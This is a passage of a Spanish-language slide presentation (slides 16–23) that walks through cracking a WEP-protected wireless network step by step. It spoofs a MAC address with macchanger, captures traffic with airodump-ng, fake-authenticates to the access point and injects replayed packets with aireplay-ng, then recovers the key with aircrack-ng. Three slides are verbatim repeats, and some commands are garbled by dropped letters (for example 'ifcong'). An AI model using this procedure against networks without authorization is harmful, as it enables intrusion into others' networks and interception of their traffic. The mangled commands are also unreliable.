  • 16. Manos a la Obra Consola 0 Activar el Modo Monitor en la interfaz wireless airmon-ng start interfaz Cambiar la mac del mon0 por una falsa ifcong mon0 down macchanger -m 00:11:22:33:44:55 mon0 ifcong mon0 up Escaneo Inicial de las Redes airodump-ng mon0 salimos una ves escogemos la red que deseamos estudiar. Escuchar traco especico de la red airodump-ng -c [canal] -w [nombre red] mon0 Se puede agregar la opcion bssid mac ap para ser mas preciso
  • 17. Manos a la Obra Consola 0 Activar el Modo Monitor en la interfaz wireless airmon-ng start interfaz Cambiar la mac del mon0 por una falsa ifcong mon0 down macchanger -m 00:11:22:33:44:55 mon0 ifcong mon0 up Escaneo Inicial de las Redes airodump-ng mon0 salimos una ves escogemos la red que deseamos estudiar. Escuchar traco especico de la red airodump-ng -c [canal] -w [nombre red] mon0 Se puede agregar la opcion bssid mac ap para ser mas preciso
  • 18. Manos a la Obra Consola 0 Activar el Modo Monitor en la interfaz wireless airmon-ng start interfaz Cambiar la mac del mon0 por una falsa ifcong mon0 down macchanger -m 00:11:22:33:44:55 mon0 ifcong mon0 up Escaneo Inicial de las Redes airodump-ng mon0 salimos una ves escogemos la red que deseamos estudiar. Escuchar traco especico de la red airodump-ng -c [canal] -w [nombre red] mon0 Se puede agregar la opcion bssid mac ap para ser mas preciso
  • 19. Manos a la Obra
  • 20. Manos a la Obra Consola 1 Nos Asociamos con el AP y mantenemos la comunicacion aireplay-ng -1 6000 -a [direccion MAC AP] -h 00:11:22:33:44:55 mon0
  • 21. Manos a la Obra Consola 2 Generamos Traco en la red aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [direccion MAC] -h 00:11:22:33:44:55 mon0
  • 22. Manos a la Obra Consola 3 Crackeamos la Contraseña aircrack-ng -z [nombre red].cap
  • 23. Manos a la Obra